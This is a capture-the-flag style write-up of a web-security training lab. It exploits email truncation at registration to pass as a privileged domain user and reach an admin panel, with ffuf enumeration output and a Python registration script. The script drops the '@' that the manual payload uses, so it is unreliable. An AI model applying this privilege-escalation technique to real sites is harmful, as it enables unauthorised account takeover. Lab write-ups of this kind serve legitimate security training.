Inconsistent handling of exceptional input
This lab doesn't adequately validate user input. You can exploit a logic flaw in its account registration process to gain access to administrative functionality. To solve the lab, access the admin panel and delete the user carlos.
I initially navigated directly to the '/register' page to observe how it processes my input. Notably, there's a note specifying that individuals affiliated with DontWannaCry should utilize their '@dontwannacry.com' email addresses. I've decided to set this information aside for potential future use.
I'll be running some enumeration in the background to ensure comprehensive coverage. If I encounter any obstacles, I can then explore alternative approaches.
➜ ~ ffuf -k -u https://0aac002903d032fd818c1b0300df0094.web-security-academy.net/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -c
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://0aac002903d032fd818c1b0300df0094.web-security-academy.net/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
admin [Status: 401, Size: 5809, Words: 1885, Lines: 86, Duration: 43ms]Upon initiation, I promptly identified an 'admin' directory. Without hesitation, I decided to explore its contents:
I took note that to access the admin interface, logging in as a DontWannaCry user is required.
In an attempt to exploit potential vulnerabilities, I experimented with user registration. One intriguing behavior emerged when I provided an excessively long string at the email parameter, surpassing the typical 255-character limit. After confirming the registration in the email client 'attacker@exploit-0a3a003a03e2326781611a1e013900d4.exploit-server.net' and logging in with the new user, I observed that the email had been truncated to precisely 255 characters.
Recalling the necessity to log in as a DontWannaCry user with the domain '@dontwannacry.com,' I conceived an idea: crafting an email string in a manner that, even after truncation, it would retain '@dontwannacry.com' as the domain.
so my new email will something like this:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@dontwannacry.com.exploit-0a3a003a03e2326781611a1e013900d4.exploit-server.netAfter confirming the registration through the email client, I successfully logged in and gained access to the admin panel. Subsequently, I proceeded to delete the 'carlos' user, successfully resolving the lab.
Here I wrote a simple python script to register with the crafted email:
import requests
url = "https://0ad900eb04e5b5688557196800cc0092.web-security-academy.net:443/register"
cookies = {"session": "QcfYeIhElK2zKXRJVod0WoqKCe771Fyu"}
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://0ad900eb04e5b5688557196800cc0092.web-security-academy.net", "Referer": "https://0ad900eb04e5b5688557196800cc0092.web-security-academy.net/register", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1", "Te": "trailers"}
buff=255-len("dontwannacry.com")
mail="a"*buff+"dontwannacry.com"+".exploit-0a3a003a03e2326781611a1e013900d4.exploit-server.net"
data = {"csrf": "7vRFv3AwJWXgH6JNp5pNwkOCCKUxfBQj", "username": "ichyaboy", "email": mail, "password": "password"}
requests.post(url, headers=headers, cookies=cookies, data=data)Last updated